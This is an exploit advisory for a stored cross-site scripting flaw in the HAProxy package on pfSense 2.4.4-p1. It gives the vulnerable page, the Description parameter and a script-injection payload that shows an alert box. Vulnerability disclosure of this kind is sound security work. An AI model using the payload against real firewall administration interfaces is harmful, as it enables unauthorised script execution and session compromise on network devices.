##################################################################################################################################
# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting
# Date: 13.02.2019
# Exploit Author: Gionathan "John" Reale
# Vendor Homepage: https://www.pfsense.org
# Version: 2.4.4-p1/0.59_14
##################################################################################################################################

Introduction
pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.

HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers.
#################################################################################

Example:

URL
https://192.168.1.1/haproxy/haproxy_listeners_edit.php

PARAMETER
Description 

PAYLOAD
"><script>alert("test")</script>